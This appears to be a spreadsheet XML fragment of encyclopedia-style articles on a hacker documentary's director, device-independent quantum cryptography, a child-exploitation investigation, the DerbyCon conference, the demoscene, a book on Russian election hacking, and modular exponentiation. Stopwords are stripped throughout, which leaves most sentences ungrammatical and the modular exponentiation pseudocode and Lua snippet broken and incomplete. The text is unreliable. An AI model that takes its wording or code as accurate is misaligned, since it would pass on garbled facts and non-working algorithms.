surveillance programs deep-state intelligence; exposing power works. according glenn greenwald, “what anonymous collective hammond’s hacks revealed barrett brown publicized criminal must exposed matter means. government lengths, including suspension rule law, stop them.” barrett brown, weev, jeremy hammond covered rollingstone, vice, wall street journal, york times, washington post, wired, gawker, buzzfeed, nation, well known france hacker wars second feature documentary vivien lesnik weisman. studied political science barnard college. attended school received washington association. went receive master fine arts directing ucla school theatre, film television. last film, havanas, opened tribeca film festival, critical acclaim, gone prestigious awards throughout world. appeared numerous television radio news programs throughout country abroad, including wnbc, wcbs, democracy now, telemundo, univision, megatv, name few. regular contributor huffington post. films recipients grand prix documentary festival internacional cinema latin paris, fledgling fund award best wip, best emerging latino filmmaker, audience award vancouver international latino film festival, first coral award festival nuevo cine latino americano (havana international film festival), grand prix signis festival internacional cinema latin paris, golden eagle, ucla spot light award, well social justice award finalist santa barbara film festival. references external links hacker wars imdb official website sxsw, hacker wars documentary subject panel discussion sxsw interactive, march 2014 vice motherboard, “south southwest ready war,” march 2014 huffington post, “weev wins battle hacker wars,” april 2014 youranonnews, hacker wars sxsw anonymous radio lorax live, interview vivien lesnik weisman upcoming film hacker wars, 2014 radioanonops, interview director hacker wars (video), 2014 -manufacturing consent, radio show, interview vivien lesnik weisman, director hacker wars, december 2013 huffington post, conversation jeremy hammond, american political prisoner sentenced years,” november 2013 huffington post, “the strange case barrett brown just stranger,” august 2013 huffington post, “jeremy hammond, american political prisoner,” 2013 huffington post, “weev, hacker didn’t hack at&amp;t,” march 2013</t>
  </si>
  <si>
    <t>Device-independent quantum cryptography</t>
  </si>
  <si>
    <t>quantum cryptographic protocol device-independent security rely trusting quantum devices used truthful. thus security analysis protocol needs consider scenarios imperfect even malicious devices. several important problems shown admit unconditional secure device-independent protocols. closely related topic (that discussed article) measurement-device independent quantum distribution. overview history mayers proposed idea designing quantum protocols using "self-testing" quantum apparatus, internal operations uniquely determined input-output statistics. subsequently, roger colbeck thesis proposed bell tests checking honesty devices. since then, several problems shown admit unconditional secure device-independent protocols, even actual devices performing bell test substantially "noisy," i.e., ideal. these problems include quantum distribution, randomness expansion, randomness amplification. distribution goal quantum distribution parties, alice bob, share common secret string communications public channels. this problem central interest quantum cryptography. also motivating problem mayers yao's paper. long sequence works prove unconditional security robustness. vazirani vidick first reach goal. subsequently, miller proved similar result using different approach. randomness expansion goal randomness expansion generate longer private random string starting uniform input string using untrusted quantum devices. idea using bell test achieve goal first proposed roger colbeck ph.d. thesis. subsequent works aimed prove unconditional security robustness increase rate expansion. vazrani vidick first prove full quantum security exponentially expanding protocol. miller achieved several additional features, including cryptographic level security, robustness, single-qubit requirement quantum memory. approach subsequently extended authors show noise level approach obvious upper bound, output become deterministic. randomness amplification goal randomness amplification generate near-perfect randomness (approximating fair coin toss) starting single source weak randomness coin whose tosses somewhat unpredictable, though biased correlated previous tosses). this known impossible classically. however, using quantum devices, becomes possible even devices untrusted. roger colbeck renato renner motivated physics considerations question first. their construction subsequent improvement gallego secure non-signalling adversary, significant physical interpretations. first construction require structural assumptions weak source chung, shi, references</t>
  </si>
  <si>
    <t>Operation Blue Orchid</t>
  </si>
  <si>
    <t>operation blue orchid joint united states-russian operation dismantle online child pornography ring, centering website blue orchid. began 2000, informant separate child pornography case came forward information blue orchid site. website, showed depictions rape, contained videos russian boys aged eight abused, selling videos around $300 each. investigation included customs officials allegedly buying videos website. operation lead arrest four americans five russians, including vsevolod solntsev-elbe, creator business manager blue orchid website. seen success particularly international cooperation charles winwood, acting commissioner customs, "operation blue orchid demonstrates really borders comes mutual interest protecting children". references</t>
  </si>
  <si>
    <t>DerbyCon</t>
  </si>
  <si>
    <t>derbycon computer security conference based louisville, kentucky. first derbycon took place 2011 founded martin bos, dave kennedy, alex adrian crenshaw. conference held hyatt regency louisville typically late september. january 2019, organizers announced derbycon 9.0, held september 2019, would last series, citing increasing difficulty holding conferences face small, vocal group people creating negativity, polarization, disruption". events derbycon common activities included: presentations keynote speakers, topics including software security, social engineering, cyber security, security present future, mobile applications. preconference training vendors publishers lockpick village mental health wellness village bourboncon, social gathering derbycon focusing sampling fine kentucky bourbon derbycon party, featured crystal method (2013, 2015) infected mushroom (2014) conferences derbycon 2011 derbycon "reunion" 2012 derbycon "all family" 2013 derbycon "family rootz" 2014 derbycon "unity" 2015 derbycon "recharge" 2016 derbycon "legacy" september 20–24, 2017 hyatt regency louisville, kentucky derbycon "evolution" october 3–7, 2018 marriott louisville, kentucky references external links derbycon website</t>
  </si>
  <si>
    <t>Demoscene</t>
  </si>
  <si>
    <t>demoscene international computer subculture focused producing demos: self-contained, sometimes extremely small, computer programs produce audiovisual presentations. purpose demo show programming, visual art, musical skills. demos demoscene productions (graphics, music, videos, games) shared festivals known demoparties, voted attend released online. demoscene's roots home computer revolution early 1980s, subsequent advent software cracking. crackers altered code video games remove copy protection, claiming credit adding introduction screens ("cracktros"). they soon started competing best visual presentation additions. through making intros stand-alone demos, community eventually evolved, independent gaming: 29–30 software sharing scenes. demoscene productions made latest consumer technology vintage home computers consoles. often terms "newschool" "oldskool" vaguely used describe products newer older computers. oldskool department techniques past like ascii/ansi art, pixel graphics, chipmusic constantly used. concept prior popularity compatibles, home computers given line relatively little variance basic hardware, made capabilities practically identical. therefore, variations among demos created computer line attributed programming alone, rather computer better hardware. this created competitive environment demoscene groups would outperform creating outstanding effects, often demonstrate felt machine better another (for example commodore amiga versus atari 8-bit family atari st). demo writers went great lengths every last performance target machine. where games application writers concerned stability functionality software, demo writer typically interested many cycles routine would consume and, generally, best squeeze great activity onto screen. writers went exploit known hardware errors produce effects manufacturer computer intended. perception demo scene going extremes charting territory added draw. categories there several categories demos informally classified into, important division freeform demos size-restricted intros, difference visible competitions nearly demo party. typical competition categories intros intro intro, size executable file restricted 65536 4096 bytes, respectively. competitions choice platform restricted; 8-bit computers like atari commodore 16-bit amiga atari such restrictions provide challenge coders, musicians graphics artists, make device intended original design. history earliest computer programs resemblance demos demo effects found among so-called display hacks. display hacks predate demoscene several decades, earliest examples dating back early 1950s.demos demoscene sense began software crackers' "signatures", crack screens crack intros attached software whose copy protection removed. first crack screens appeared apple early 1980s, often nothing plain text screens crediting cracker group. gradually, static screens evolved increasingly impressive-looking introductions containing animated effects music. eventually, many cracker groups started release intro-like programs separately, without attached unlicensed software. these programs initially known various names, letters messages, later came known demos.in 1980, atari, inc. began using looping demo visual effects music show features atari 400/800 computers stores. 1985 consumer electronics show, atari showed demoscene-style demo latest 8-bit computers alternated walking robot flying spaceship, music, animating larger objects typically seen systems; sections separated atari logo. program released public. also 1985, large, spinning, checkered ball—casting translucent shadow—was signature demo hardware capable commodore's amiga announced. simple demo-like music collections together 1985 charles deenen, inspired crack intros, using music taken games adding homemade color graphics. following year movement known demoscene born. dutch groups 1001 crew judges, commodore 64-based, often mentioned among earliest demo groups. whilst competing 1986, produced pure demos original graphics music involving casual work, used extensive hardware trickery. time demos others, antony crowther, started circulating compunet united kingdom. culture demoscene mainly european phenomenon. competition-oriented subculture, groups individual artists competing technical artistic excellence. those achieve excellence dubbed "elite", follow demoscene's implicit rules called "lamers"; rules emphasize creativity "ripping" else using permission) works others, good contacts within scene, showing effort rather asking help. both competitiveness sense cooperation among demosceners comparisons earlier hacker culture academic computing.: demoscene closed subculture, seeks receives little mainstream public interest.: 2010, size scene estimated 10,000.in early days, competition came form setting records, like number "bobs" (blitter objects) screen frame, number dycp (different character position) scrollers c64. these days, organized competitions, compos, held demoparties, although online competitions well. also common diskmags voting-based charts provide ranking lists best coders, graphicians, musicians, demos things. however, respect charts diminished since 1990s. party-based competitions usually require artist group member present event. winners selected public voting amongst visitors awarded prizegiving ceremony party. competitions typical demo event include demo compo, intro compo (usually kb), graphics compo music compo. most parties also split categories platform, format style. there criteria rules voters bound visitor typically votes entries made biggest impression them. demos, impression often attempted programming techniques introducing effects breaking performance records effects; emphasis moved technical excellence artistic values overall design, audiovisual impact mood. recent years, initiative award demos alternative arose name scene.org awards. essential concept awards avoid subjectivity mass-voting parties, select well-renowned jury handle task selecting given year's best productions several aspects, best graphics best intro. this award canceled 2012. 2020, finland added demoscene national unesco list intangible cultural heritage. first digital subculture intangible cultural heritage list. 2021, germany poland also added demoscene national unesco list intangible cultural heritage. groups demosceners typically organize small, tightly knit groups, centered around coder (programmer), musician graphician (graphics designer). various supporting roles exist groups grow dozens people, demos actually created small number people.: 32–33 groups always names, similarly individual members pick handle addressed large community. while practice using handles rather real names borrowing cracker/warez culture, serves hide identity cracker enforcement, demoscene (oriented toward legal activities) mostly serves manner self-expression. group members tend self-identify group, often extending handle group's name, following patterns "handle group" "handle/group".: 31–32 parties demoparty event demosceners computer enthusiasts gather take part competitions, nicknamed compos, present demos (short audio-visual presentations computer art) works digital music. typical demoparty non-stop event spanning weekend, providing visitors time socialize. competing works, least important competitions, usually shown night, using video projector loudspeakers. important competition usually demo compo. concept visitors demoparty often bring computers compete show works. end, parties provide large hall tables, electricity usually local area network connected internet. respect, many demoparties resemble parties, many largest events also gather gamers computer enthusiasts addition demosceners. major difference real demoparty party demosceners typically spend time socializing (often outside actual party hall) front computers.large parties often tried come alternative terms describe concept general public. while events always known "demoparties", "copyparties" "parties" subculture itself, often referred "computer conferences", "computer fairs", "computer festivals", "computer festivals", "youngsters' computer events" even "geek gatherings" "nerd festivals" mass media general public. demoscene events frequent continental europe, around fifty parties every year—in comparison, united states three year. most events local, gathering demomakers mostly single country, largest international parties (such breakpoint assembly) attract visitors globe.most demoparties relatively small size, number visitors varying dozens hundred. largest events typically gather thousands visitors, although little connection demoscene. aspect, scene separates "pure" parties (which abandons non-scene related activities promotion) "crossover" parties. history demoparties started appear 1980s form copyparties, software pirates demomakers gathered meet share software. competitions become major aspect events early 1990s. copyparties mainly pertained amiga scene. compatibles started take market, difficulties easily making nice demos intros increased. along increased police crackdowns copying copyrighted software, "underground" copyparties gradually replaced slightly higher-profile events came known demoparties. however, "old-school" demosceners still prefer word copyparty even today's demoparties. during 1990s, focus events shifted away illegal activities demomaking competitions. copying copyrighted material often explicitly prohibited organizers, many events also forbade consumption alcohol. however, illegal copying "boozing" still continued take place, although less public form. three well-known appreciated large-scale demoparties established early 1990s: party denmark, assembly finland gathering norway. taking place every year gathering thousands visitors, parties used leading demoscene events period. assembly still retains status today. gathering continues organized yearly generic "computer party", demosceners prefer revision germany, takes place time. emergence high-profile demoparties gave rise phenomena always well welcomed scene. events started attract unaffiliated computer enthusiasts often generally referred "lamers" original attendants. particularly visible group large gatherings since mid-1990s gamers, often little interest demoscene mainly party facilities playing multi-player computer games. however, many today's demosceners received first interest demos demomaking visit large demoparty. common properties parties usually last four days, often friday sunday ensure sceners work study also able attend. small parties (under attendants) usually take place cultural centers schools, whereas larger parties (over 400–500 people) typically take place sports halls concert halls. entrance fees usually €40, given size location party. during common practice many countries allow women enter party free (mostly concentration female attendees, usually 20%), albeit parties still enforced "only vote ticket" rule, means attendee free able vote paid ticket. this practice largely abandoned 2010s. attendees allowed bring desktop computer along, means necessity usually omitted sceners, especially travel long distance. those computer-related jobs even regard demoparty well-deserved break sitting front computer. bring computer, becoming increasingly common bring laptop sort handheld device rather complete desktop partygoers often bring various senseless gadgets parties make desk space look unique; anything disco ball plasma lamp large display panel complete scrolling message "elite" owner many visitors also bring large loudspeakers playing music. this kind activity particularly common among partygoers, experienced attendees tend prefer quiet relaxed atmosphere. those need housing party often offered separate "sleeping room", usually isolated empty room sort carpet mats, attendees able sleep, separated noise. most sceners prefer bringing sleeping bags this, well mattresses sleeping pads. parties offer sleeping room generally allow sceners sleep tables. partyplaces often become decorated visitors flyers banners. these serve promotional reasons, cases advertise certain group, sometimes create promotion given demoscene product, demo diskmag, possibly released later party. major portion events demoparty often takes place outdoors. demosceners usually spend considerable time outside beer talk, engage sort open-air activity barbecuing sport, hardware throwing soccer. also common tradition gather around bonfire night, usually compos. recent years, many parties available spectators internet: this tradition first started live team demoscene.tv, broadcast event live created footage postmortem video-report. this since ostensibly replaced scenesat radio crew, provide live streaming radio shows parties, larger parties offer dedicated streaming video solution. list demoparties this incomplete list, shows major parties years. (note: year ranges might include years party organized, organized after.) influence although demos still less obscure form even traditionally active demoscene countries, scene influenced areas computer games industry media art.a great deal european game programmers, artists musicians come demoscene, often cultivating learned techniques, practices philosophies work. example, finnish company remedy entertainment, known payne series games, founded group future crew, employees former active finnish demosceners. sometimes demos even provide direct influence even game developers demoscene affiliation: instance, will wright names demoscene major influence maxis game spore, largely based procedural content generation. similarly, quakecon 2011, john carmack noted "thinks highly" people intros, example artificial limitations encouraging creative programming. jerry holkins penny arcade claimed "abiding love" demoscene, noted "stuff worth knowing".certain forms computer strong affiliation demoscene. tracker music, example, originated amiga games industry soon heavily dominated demoscene musicians; producer adam fielding claims tracker/demoscene roots. currently, major tracking scene separate actual demoscene. form static computer graphics demosceners traditionally excelled pixel art; artscene information related subculture. origins creative coding tools like shadertoy three.js directly traced back scene.over years, desktop computer hardware capabilities improved orders magnitude, programmers, tight hardware restrictions longer common issue. nevertheless, demosceners continue study experiment creating impressive effects limited hardware. since handheld consoles cellular phones comparable processing power capabilities desktop platforms (such resolution screens require pixel-art, limited storage memory music replay), many demosceners able apply niche skills develop games platforms, earn living particular example angry birds, whose lead designer jaakko iisalo active well-known demoscener 90s. unity technologies another notable example, technical leads iphone, android nintendo switch platforms renaldas zioma erik hemming authors suicide barbie demo playstation portable console released 2007. some attempts made increase familiarity demos form. example, demo shows, demo galleries demoscene-related books, sometimes even programs introducing subculture works.the museum it-ceum linköping, sweden, exhibition demoscene. video games industry 4players.de reported "numerous" demo intro programmers, artists, musicians employed games industry 2007. video game companies demoscene members staff included digital illusions, starbreeze, ascaron, 49games, remedy, techland, lionhead studios, bugbear, digital reality, guerrilla games akella.the tracker music part demoscene culture could found many video games late 1990s early 2000s, unreal, unreal tournament, deus crusader: remorse, must fall: 2097, jazz jackrabbit uplink. also algorithmic composition computer scene hacker subculture minimalism (computing) netlabel specific platforms amiga demos commodore demos spectrum demos machack software used making demoscene productions graphics grafx2 music openmpt protracker fasttracker websites demozoo scene.org archive references further reading green, dave (july 1995). "demo die!". wired. 3.07. retrieved december 2007. pirtola, pilvari (2008). "introduction demoscene". mustekala. polgár, tamás "tomcat" (2005). freax: volume csw-verlag. isbn 3-9810494-0-3. reunanen, markku (2010). computer demos what makes them tick? (pdf) (licentiate). aalto university school science technology. reunanen, markku (2017). times change demoscene: creative community relationship technology (pdf) (phd). aalto university school science technology. shor, shirley; eyal, aviv (winter 2004). "demoing: emerging form just another craft? 1984–2002" (pdf). intelligent agent (4.01). archived original (pdf) june 2004. tasajärvi, lassi (2004). demoscene: real-time. evenlake studios. isbn 952-91-7022-x. vigh, david; polgár, tamás "tomcat" (2006). freax album. csw-verlag. vigh, david (2003). "pixelstorm" (pdf). archived original (pdf) august 2008.. selected artworks demoscene graphicians; bugfixed 2007. "the demoscene" (pdf).. flyer digitale kultur. "demoscene research".. bibliography academic publications demoscene. demoscene documentary's channel youtube. seven-part documentary series finnish demoscene. cracked, stories from eastern west podcast episode birth rise finland's demoscene. about demoscene</t>
  </si>
  <si>
    <t>The Plot to Hack America</t>
  </si>
  <si>
    <t>plot hack america: putin's cyberspies wikileaks tried steal 2016 election non-fiction book malcolm nance author describes russian interference 2016 united states elections. published paperback, audiobook, e-book formats 2016 skyhorse publishing. second edition also published year, third edition 2017. nance researched russian intelligence, working russian interpreter studying history.nance described black propaganda warfare known active measures (russia today) sputnik news. recounts vladimir putin's rise, details trump campaign ties russia. nance concludes putin managed cyberattack hacker groups cozy bear fancy bear.the wall street journal placed book list "best-selling books" week february 2017, seventh place category "nonfiction e-books". york journal books called essential primer anyone wanting fully informed unprecedented events surrounding 2016 u.s. presidential election." napa valley register described nance's work "the best book subject". huffington post remarked putin played game thrones election. newsweek wrote problem disinformation tactics time debunked, public already consumed falsehoods. summary book dedicated u.s. army officer humayun khan begins foreword spencer ackerman. nance details russian interference 2016 u.s. elections describes how, march 2016, democratic national committee (dnc) servers hacked someone seeking opposition research donald trump. nance learnt hacker, guccifer 2.0, would release hacked materials. nance gives context including trump's motivations president made 2011 white house correspondents' association dinner, criticism barack obama, entry 2016 race white house.nance discusses black propaganda techniques used russian federation, characterizes (formerly russia today) sputnik news agencies disinformation. asserts president vladimir putin intimately involved russian intelligence operation elect trump, directing entire covert operation himself.in "trump's agents, putin's assets", nance delves links trump associates russian officials, asserting multiple agents trump assets putin, providing access trump. nance identifies putin's strategy electing trump american president, referred "operation lucky-7: kremlin plan elect president", describes multitask effort involving hacking acquire personal information members, well seek compromising material known kompromat."battles cyber bears" describes hacker entities tied russian intelligence: cozy bear fancy bear. cozy bear believed linked russian federal security service (fsb) foreign intelligence service (svr), fancy bear associated russian military intelligence agency gru. nance describes russian intelligence attempted make releases leaked emails appear deniable. "wikileaks: russia's intelligence laundromat", likens whistleblower website wikileaks money laundering. nance asserts wikileaks willingly collaborated operation. "when cyber bears attack" describes impact podesta emails email leaks 2016 clinton campaign.finally, "cyberwar defend democracy", nance reiterates u.s. target cyberwarfare russian intelligence agencies fsb, directly ordered putin. nance writes russia succeeded casting doubt citizens strength u.s. democracy. posits that, u.s. populace large internalize future acts cyberwarfare dangerous attempts subvert daily life, could lead actual itself. composition publication before beginning research plot hack america, nance gained counter-intelligence experience u.s. navy senior chief petty officer naval cryptology, served 1981–2001. garnered expertise within fields intelligence counterterrorism. author learned russian history interpreter russian, began working intelligence field research history soviet union spying agency kgb. devoted years research analyzing foreign relations russia.prior analyzing russian interference 2016 u.s. elections, nance's background counter-intelligence analysis included management think tank called terror asymmetrics project strategy, tactics radical ideologies, consisting central intelligence agency military intelligence officers direct prior field experience. nance's books counter-terrorism include al-qaeda, terrorist recognition handbook, terrorists iraq, defeating isis, hacking isis.nance began work plot hack america incidentally, already engaged writing hacking isis. during course research hacking isis, discovered computer hacking germany's legislative body, bundestag, french television station tv5monde. time, hacks thought caused isis, instead traced back russian hacking group, cyber bears. nance knew russian intelligence operated group, realized attribution isis false flag operation throw investigators trail. this gave nance prior knowledge russian intelligence tactics, cyber bears, infiltrate servers purposes disrupting government case germany, injecting propaganda case france. after 2016 hack dnc, apparent nance identical foreign agency carried attack, gru. nance's suspicions borne accurate security firm crowdstrike determined cozy bear fancy bear behind attack. nance akin watergate scandal, albeit virtual attack instead physical break-in democratic facilities.nance told c-span majority working life identified member u.s. republican party, describing "colin powell school republicanism", plot hack america written desire intelligence expert document background behind attack foreign power u.s. democratic institutions. nance realized gravity attack considered operation must sanctioned managed former officer vladimir putin himself. nance member board directors international museum washington, d.c. through work museum, nance befriended former general oleg kalugin, advised "once always kgb". nance considered putin's objectives would simply harm hillary clinton actually attempt achieve ascendancy donald trump u.s. president.the plot hack america first published online format september 2016, united states intelligence community assessments russian interference 2016 united states elections delivered president barack obama. appendix book notes timing, points out, "many conclusions included consensus opinion principal three intelligence agencies, nsa, cia, fbi, identical plot hack america". first paperback format published october 2016. second edition released year, addition ebook format. another edition published 2017, along audiobook narrated gregory itzin. author subject hecklers appeared event discuss work books books miami, florida 2017. reception book commercial success, wall street journal placed plot hack america list "best-selling books" week february 2017, place category "nonfiction e-books". book included reading course political science pasadena city college. review york journal books, michael lipkin effusive, writing: "malcolm nance's plot hack america essential primer anyone wanting fully informed unprecedented events surrounding 2016 u.s. presidential election." lipkin wrote author's expertise subject matter: patriot highly experienced respected intelligence expert bringing bear deep extensive knowledge conclusions perhaps important developments american history." lawrence swaim gave nance's work favorable reception, book review napa valley register. wrote, "it's quick read, present easily best book subject." swaim recommended resources back book, writing, "but what’s really killer nance book appendix, contains extremely revealing assessments made american intelligence agencies, presented unclassified format."kenneth bernstein wrote daily convince read important book", echoed warning conclusion dangers posed cyberwarfare. bernstein wrote book's argumentation strengthened because, "every single assertion nance offers backed material clearly documented notes". bernstein wrote favorably addition book's foreword guardian editor national security, spencer ackerman. italian language newspaper stampa called book "molto bello". writing independent, andy martin, commented, suppose weak spot subtitle word 'tried'. surely 'try'?"maclean's wrote plot hack america, "was prescient russia’s meddling 2016 u.s. election." brian lamb, founder retired c-span, commented book's titled choice seemed political nature. strategic finance noted "nance focuses hybrid cyber warfare, kompromat, uses cyber assets", attack political enemies. techgenix journalist michael adams wrote nance provides in-depth analysis issue characterized multiple commentators national controversy rivalling watergate scandal. adams called book engaging tale espionage including context russian intelligence background vladimir putin kgb. voice america commented nance capably "outlined evidence" book fears russian foreign manipulation 2016 election. burnett wrote huffington post nance described game thrones strategem vladimir putin, using donald trump tool embarrass hillary clinton barack obama. burnett observed nance posited trump putin play trump's avarice narcissism. jeff stein newsweek wrote power disinformation tactics described nance's book: "the genius technique correction takes days, weeks, catch fiction. then, gullible masses digested fabrications truth." aftermath after plot hack america published october 2016, nance interviewed april 2017 c-span book, impact media operations american society. argued russia today's actions back notion black propaganda operations effective, referencing impact disinformation operations. nance cited research senate intelligence committee, house intelligence committee, director national intelligence russia today's methods publishing propaganda propagating fake news. traced larger problem echo chambers, wherein false invented story sputnik news traveled bloggers breitbart news, became believed factual trump administration officials, eventually re-reported russia today, falsely stating simply reporting events created white house itself.the author recalled c-span days soviet union soviet intelligence operation practice infiltrate manage reporting agencies communist party addition political figures right left perspectives, order denigrate u.s. democratic interests. nance warned russia control vladimir putin motivated identical initiative, armed greater tools funding soviet union past. lamented prior putin's appointment prime minister russia boris yeltsin, country taking steps towards democracy. nance traced putin's rise descent democracy russia favor oligarchy ruling class wealthy individuals managing autocratic society. nance said u.s. citizens become agents russia employ russia today naïveté nature russian propaganda operations geared harm u.s. values civil liberties.nance placed utilization propaganda russian intelligence agencies russia today outlets including social media part larger effort global cyberwarfare. characterized form hybrid warfare blending traditional propaganda computer tools subversion media organizations. case study cited aleksandr dugin, russian neofascist political activist views favored putin, whose tweets expound perspectives democratic institutions successful. also case impeachment dezinformatsia: active measures soviet strategy disinformation soviet disinformation timeline russian interference 2016 united states elections timeline russian interference 2016 united states elections (july 2016–election day) trump: kremlin candidate? trump–russia dossier references external links official website smiley, tavis (may 2017), u.s. intelligence counter-terrorism expert malcolm nance, retrieved june 2017 lamb, brian (april 2017), "q&amp;a malcolm nance", c-span (video), retrieved june 2017 chartock, alan, "counter-terrorism expert author malcolm nance", wamc, retrieved june 2017 lopate, leonard (december 2016), "wikileaks, cyber bears hacking 2016 election", wnyc, retrieved june 2017 moss-coane, marty (november 2016), "russia, hackers, election donald trump", whyy-fm, archived original 2017, retrieved june 2017 hobson, jeremy (october 2016), "how hackable election?", here now, wbur, retrieved june 2017</t>
  </si>
  <si>
    <t>Modular exponentiation</t>
  </si>
  <si>
    <t>modular exponentiation exponentiation performed modulus. useful computer science, especially field public-key cryptography, used diffie-hellman exchange public/private keys. modular exponentiation remainder integer (the base) raised power (the exponent), divided positive integer (the modulus); from definition division, follows example, given dividing leaves remainder modular exponentiation performed negative exponent finding modular multiplicative inverse modulo using extended euclidean algorithm. that (mod m).modular exponentiation efficient compute, even large integers. hand, computing modular discrete logarithm finding exponent given believed difficult. this one-way function behavior makes modular exponentiation candidate cryptographic algorithms. direct method direct method calculating modular exponent calculate directly, take number modulo consider trying compute given 497: (mod 497)one could calculator compute 413; comes 67,108,864. taking value modulo 497, answer determined 445. note digit length digits length, value digits length. strong cryptography, often least 1024 bits. consider 1076 perfectly reasonable values. example, digits length digits length, value 1,304 decimal digits length. such calculations possible modern computers, sheer magnitude numbers causes speed calculations slow considerably. increase even provide better security, value becomes unwieldy. time required perform exponentiation depends operating environment processor. method described requires o(e) multiplications complete. memory-efficient method keeping numbers smaller requires additional modular reduction operations, reduced size makes operation faster, saving time well memory) overall. this algorithm makes identity mthe modified algorithm increase step else, contains correct solution (mod m).note every pass step equation (mod holds true. when step executed times, then, contains answer sought. summary, algorithm basically counts ones reaches multiply modulo operation time adds ensure results stay small). example presented again. algorithm passes step thirteen times: 256. (256 1024 120. (120 480. (480 1920 429. (429 1716 225. (225 403. (403 1612 121. (121 484. (484 1936 445.the final answer therefore 445, first method. like first method, requires o(e) multiplications complete. however, since numbers used calculations much smaller numbers used first algorithm's calculations, computation time decreases factor least o(e) method. pseudocode, method performed following way: function modular_pow(base, exponent, modulus) modulus return e_prime exponent-1 base) modulus return right-to-left binary method third method drastically reduces number operations perform modular exponentiation, keeping memory footprint previous method. combination previous method general principle called exponentiation squaring (also known binary exponentiation). first, required exponent converted binary notation. that written {\displaystyle e=\sum _{i=0}^{n-1}a_{i}2^{i}} notation, length bits. take value definition, value written {\displaystyle b^{e}=b^{\left(\sum _{i=0}^{n-1}a_{i}2^{i}\right)}=\prod _{i=0}^{n-1}b^{a_{i}2^{i}}} solution therefore: {\displaystyle c\equiv \prod _{i=0}^{n-1}b^{a_{i}2^{i}}{\pmod {m}}} pseudocode following example pseudocode based applied cryptography bruce schneier. inputs base, exponent, modulus correspond equations given above. function modular_pow(base, exponent, modulus) modulus return assert (modulus (modulus overflow base result base base modulus exponent (exponent result (result base) modulus exponent exponent base (base base) modulus return result note upon entering loop first time, code variable base equivalent however, repeated squaring third line code ensures completion every loop, variable base equivalent number times loop iterated. (this makes next working binary exponent exponent, least-significant exponent0). first line code simply carries multiplication {\displaystyle \prod _{i=0}^{n-1}b^{a_{i}2^{i}}{\pmod {m}}} zero, code executes since effectively multiplies running total one. instead one, variable base (containing value original base) simply multiplied example, base raised exponent exponent 1101 binary. there four binary digits, loop executes four times, values first, initialize result {\displaystyle preserve value variable {\displaystyle r\leftarrow 1\,(=b^{0}){\text{ }}x\leftarrow step {\displaystyle r\leftarrow r\cdot x{\text{ }}(=b^{1})} {\displaystyle x\leftarrow x^{2}{\text{ }}(=b^{2})} step reset {\displaystyle x\leftarrow x^{2}{\text{ }}(=b^{4})} step {\displaystyle r\leftarrow r\cdot x{\text{ }}(=b^{5})} {\displaystyle x\leftarrow x^{2}{\text{ }}(=b^{8})} step {\displaystyle r\leftarrow r\cdot x{\text{ }}(=b^{13})} this last step need square x.we done: {\displaystyle b^{13}} here calculation, compute power performed modulo 497. initialize: {\displaystyle r\leftarrow 1\,(=b^{0})} {\displaystyle x\leftarrow b=4} step {\displaystyle r\leftarrow r\cdot 4\equiv 4{\pmod {497}}} {\displaystyle x\leftarrow x^{2}{\text{ }}(=b^{2})\equiv 4^{2}\equiv 16{\pmod {497}}} step reset {\displaystyle x\leftarrow x^{2}{\text{ }}(=b^{4})\equiv 16^{2}\equiv 256{\pmod {497}}} step {\displaystyle r\leftarrow r\cdot x{\text{ }}(=b^{5})\equiv 4\cdot 256\equiv 30{\pmod {497}}} {\displaystyle x\leftarrow x^{2}{\text{ }}(=b^{8})\equiv 256^{2}\equiv 429{\pmod {497}}} step {\displaystyle r\leftarrow r\cdot x{\text{ }}(=b^{13})\equiv 30\cdot 429\equiv 445{\pmod {497}}} done: {\displaystyle 4^{13}\equiv 445{\pmod {497}}} result obtained previous algorithms. running time algorithm o(log exponent). when working large values exponent, offers substantial speed benefit previous algorithms, whose time o(exponent). example, exponent 1048576, algorithm would steps instead 1048576 steps. implementation function modpow(b, return else local (r*b) (b*b) --use math.floor(e older return left-to-right binary method also bits exponent left right order. practice, would usually want result modulo modulus case, would reduce multiplication result (mod proceeding. simplicity, modulus calculation omitted here. this example shows compute {\displaystyle b^{13}} using left right binary exponentiation. exponent 1101 binary; bits, iterations. initialize result {\displaystyle r\leftarrow 1\,(=b^{0})} step {\displaystyle r\leftarrow r^{2}\,(=b^{0})} compute {\displaystyle r\leftarrow r\cdot b\,(=b^{1})} step {\displaystyle r\leftarrow r^{2}\,(=b^{2})} compute {\displaystyle r\leftarrow r\cdot b\,(=b^{3})} step {\displaystyle r\leftarrow r^{2}\,(=b^{6})} done step; step {\displaystyle r\leftarrow r^{2}\,(=b^{12})} compute {\displaystyle r\leftarrow r\cdot b\,(=b^{13})} minimum multiplications computer programming, vol. seminumerical algorithms, page 463, donald knuth notes contrary assertions, method always give minimum possible number multiplications. smallest counterexample power binary method needs multiplications. instead, form multiplications, squaring squaring finally multiplying thereby achieving desired result five multiplications. however, many pages follow describing sequences might contrived general. generalizations matrices m-th term constant-recursive sequence (such fibonacci numbers perrin numbers) term linear function previous terms computed efficiently modulo computing corresponding companion matrix. methods adapt easily application. this used primality testing large numbers example. pseudocodea recursive algorithm modexp(a, square matrix. function matrix_modexp(matrix return identity matrix return matrix_modexp(a, matrix matrix_modexp(a, return finite cyclic groups diffie–hellman exchange uses exponentiation finite cyclic groups. methods modular matrix exponentiation clearly extend context. modular matrix multiplication (mod simply replaced everywhere group multiplication reversible quantum modular exponentiation quantum computing, modular exponentiation appears bottleneck shor's algorithm, must computed circuit consisting reversible gates, broken quantum gates appropriate specific physical device. furthermore, shor's algorithm possible know base modulus exponentiation every call, enables various circuit optimizations. software implementations because modular exponentiation important operation computer science, efficient algorithms (see above) much faster simply exponentiating taking remainder, many programming languages arbitrary-precision integer libraries dedicated function perform modular exponentiation: python's built-in pow() (exponentiation) function takes optional third argument, modulus .net framework's biginteger class modpow() method perform modular exponentiation java's java.math.biginteger class modpow() method perform modular exponentiation matlab's powermod function symbolic math toolbox wolfram language powermod function perl's math::bigint module bmodpow() method perform modular exponentiation raku built-in routine expmod. go's big.int type contains exp() (exponentiation) method whose third parameter, non-nil, modulus php's math library bcpowmod() function perform modular exponentiation multiple precision arithmetic library (gmp) library contains mpz_powm() function perform modular exponentiation custom function @powermod() filemaker (with 1024-bit encryption example) ruby's openssl package openssl::bn#mod_exp method perform modular exponentiation. prime calculator cas.powmod() function perform modular exponentiation. larger this maximum precision calculators including prime. also montgomery reduction, calculating remainder modulus large. kochanski multiplication, serializable method calculating remainder modulus large barrett reduction, algorithm calculating remainder modulus large. references external links schneier, bruce (1996). applied cryptography: protocols, algorithms, source code second edition (2nd ed.). wiley. isbn 978-0-471-11709-4. 